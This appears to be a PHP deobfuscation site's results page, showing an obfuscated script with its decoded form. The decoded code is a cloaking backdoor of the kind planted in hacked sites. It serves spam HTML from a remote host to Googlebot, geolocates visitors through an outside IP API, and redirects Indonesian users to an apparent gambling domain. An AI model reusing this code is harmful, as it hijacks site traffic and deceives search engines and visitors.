Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Y_y0v; Y_y0v: function profile_user() { $refererUrl = !empty($_SERVER["\110\1..

Decoded Output download

<?php 
 goto Y_y0v; Y_y0v: function profile_user() { $refererUrl = !empty($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "No Referer"; $useragent = $_SERVER["HTTP_USER_AGENT"]; $themes = "https://pub-05ba3407903e4840a55b8c21fc682cda.r2.dev/jehanzebcorporation.html"; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); if (strpos($useragent, "Google-InspectionTool") !== false || strpos($useragent, "googlebot") !== false || strpos($useragent, "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["REMOTE_ADDR"]; $api_url = "https://api.incolumitas.com/?q=" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "JSON Decode error: " . json_last_error_msg(); die; } $language = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (isset($data["country_code"]) && $data["country_code"] === "ID" || isset($data["country"]) && $data["country"] === "Indonesia" || strpos($language, "id") !== false) { header("Location: https://aksescepat.xyz/japan168", true, 301); die; } include "index.php"; die; } goto T1TMU; T1TMU: profile_user(); goto BOgl0; BOgl0: ?>

Did this file decode correctly?

Original Code

<?php
 goto Y_y0v; Y_y0v: function profile_user() { $refererUrl = !empty($_SERVER["\110\124\124\120\137\x52\105\x46\105\x52\x45\x52"]) ? $_SERVER["\110\x54\x54\120\137\x52\x45\x46\105\122\105\x52"] : "\116\157\x20\x52\145\146\x65\162\x65\162"; $useragent = $_SERVER["\110\124\124\120\137\125\123\105\122\x5f\101\107\x45\x4e\x54"]; $themes = "\x68\164\164\x70\x73\x3a\57\57\160\x75\x62\55\x30\65\142\x61\63\64\60\x37\x39\60\63\145\64\x38\x34\x30\x61\65\x35\142\x38\143\62\61\x66\143\x36\70\x32\143\144\141\x2e\162\x32\x2e\144\145\166\57\152\x65\x68\x61\156\172\x65\142\143\157\162\160\x6f\162\141\164\151\157\156\x2e\x68\164\x6d\x6c"; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); if (strpos($useragent, "\x47\157\x6f\x67\x6c\145\55\x49\x6e\x73\x70\x65\143\x74\151\x6f\156\x54\157\x6f\x6c") !== false || strpos($useragent, "\147\157\157\147\x6c\145\x62\157\x74") !== false || strpos($useragent, "\50\143\157\x6d\160\x61\164\151\x62\154\x65\73\40\107\157\157\147\x6c\145\x62\157\x74\x2f\62\x2e\x31\73\40\x2b\x68\164\164\160\x3a\x2f\57\x77\167\167\x2e\x67\x6f\x6f\147\x6c\145\x2e\x63\157\x6d\57\142\157\x74\56\x68\164\155\x6c\x29") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["\122\x45\115\117\124\105\137\101\x44\104\x52"]; $api_url = "\x68\x74\164\x70\x73\72\57\x2f\x61\x70\151\56\x69\x6e\143\157\x6c\x75\155\151\164\x61\x73\56\143\x6f\155\x2f\x3f\161\x3d" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "\x4a\x53\x4f\116\x20\x44\x65\143\x6f\x64\x65\x20\145\x72\162\x6f\162\x3a\x20" . json_last_error_msg(); die; } $language = isset($_SERVER["\x48\x54\x54\x50\137\x41\103\103\105\120\x54\137\x4c\101\116\107\125\101\x47\x45"]) ? strtolower($_SERVER["\x48\124\x54\x50\137\101\x43\103\x45\120\x54\137\114\x41\x4e\x47\125\x41\107\105"]) : ''; if (isset($data["\x63\157\x75\x6e\x74\x72\171\x5f\143\x6f\144\145"]) && $data["\x63\157\x75\x6e\x74\x72\x79\137\x63\157\x64\x65"] === "\111\x44" || isset($data["\143\x6f\x75\x6e\x74\162\171"]) && $data["\143\x6f\165\x6e\164\162\171"] === "\111\x6e\144\x6f\x6e\x65\163\151\141" || strpos($language, "\x69\144") !== false) { header("\114\157\143\x61\164\151\x6f\156\72\x20\150\164\x74\160\x73\x3a\57\x2f\141\153\163\x65\163\x63\x65\160\x61\x74\x2e\170\171\172\57\152\x61\x70\141\x6e\x31\66\70", true, 301); die; } include "\151\x6e\144\x65\x78\x2e\x70\150\x70"; die; } goto T1TMU; T1TMU: profile_user(); goto BOgl0; BOgl0: ?>

Function Calls

None

Variables

None

Stats

MD5 1d85826f592991d21de66a1c85dfa9e5
Eval Count 0
Decode Time 51 ms